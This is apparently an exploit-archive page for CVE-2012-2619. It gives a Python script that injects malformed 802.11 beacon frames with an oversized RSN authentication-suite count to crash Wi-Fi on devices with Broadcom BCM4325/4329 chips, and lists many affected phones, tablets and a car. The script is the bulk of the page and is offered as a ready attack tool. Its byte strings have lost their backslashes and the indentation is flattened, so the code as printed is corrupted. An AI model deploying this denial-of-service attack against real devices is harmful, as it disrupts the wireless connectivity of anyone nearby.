[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Broadcom DoS on BCM4325 and BCM4329 Devices
# Published : 2012-11-15
# Author :
# Previous Title : Internet Explorer 9 Memory Corruption Crash PoC
# Next Title : Adobe Reader 11.0.0 Stack Overflow Crash PoC
# Exploit Author:
CoreLabs (Core Security Technologies) fue descubierta por el
investigador argentino Andr¨¦s Blanco,
# Vendor Homepage:
# Software Link: [download link if available]
# Version: 1.0
# Tested on:
Apple iPhone 3GS
Apple iPod 2G
HTC Touch Pro 2
HTC Droid Incredible
Samsung Spica
Acer Liquid
Motorola Devour
Veh¨ªculo Ford Edge
Dispositivos afectados con el chipset BCM4329:
Apple iPhone 4
Apple iPhone 4 Verizon
Apple iPod 3G
Apple iPad Wi-Fi
Apple iPad 3G
Apple iPad 2
Apple Tv 2G
Motorola Xoom
Motorola Droid X2
Motorola Atrix
Samsung Galaxy Tab
Samsung Galaxy S 4G
Samsung Nexus S
Samsung Stratosphere
Samsung Fascinate
HTC Nexus One
HTC Evo 4G
HTC ThunderBolt
HTC Droid Incredible 2
LG Revolution
Sony Ericsson Xperia Play
Pantech Breakout
Nokia Lumina 800
Kyocera Echo
Asus Transformer Prime
Malata ZPad"
# CVE : 2012-2619
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def beaconFrameGenerator():
sequence = 0
while(1):
sequence = sequence % 4096
# Frame Control
frame = 'x80' # Version: 0 - Type: Managment - Subtype: Beacon
frame += 'x00' # Flags: 0
frame += 'x00x00' # Duration: 0
frame += 'xffxffxffxffxffxff' # Destination: ff:ff:ff:ff:ff:ff
frame += 'x00x00x00x15xdexad' # Source: 00:00:00:15:de:ad
frame += 'x00x00x00x15xdexad' # BSSID: 00:00:00:15:de:ad
frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence:
#part of the generator
# Frame Body
frame += struct.pack('Q', time.time()) # Timestamp
frame += 'x64x00' # Beacon Interval: 0.102400 seconds
frame += 'x11x04' # Capability Information: ESS, Privacy,
#Short Slot time
# Information Elements
# SSID: buggy
frame += 'x00x05buggy'
# Supported Rates: 1,2,5.5,11,18,24,36,54
frame += 'x01x08x82x84x8bx96x24x30x48x6c'
# DS Parameter Set: 6
frame += 'x03x01x06'
# RSN IE
frame += 'x30' # ID: 48
frame += 'x14' # Size: 20
frame += 'x01x00' # Version: 1
frame += 'x00x0fxacx04' # Group cipher suite: TKIP
frame += 'x01x00' # Pairwise cipher suite count: 1
frame += 'x00x0fxacx00' # Pairwise cipher suite 1: TKIP
frame += 'xffxff' # Authentication suites count: 65535
frame += 'x00x0fxacx02' # Pairwise authentication suite 2: PSK
frame += 'x00x00'
sequence += 1
yield frame
if __name__ == "__main__":
if len(sys.argv) != 2:
print "Usage:"
print "t%s <wireless interface>" % sys.argv[0]
sys.exit(-1)
iface = sys.argv[1]
context = PyLorcon2.Context(iface)
context.open_injmon()
generator = beaconFrameGenerator()
for i in range(10000):
frame = generator.next()
time.sleep(0.100)
context.send_bytes(frame)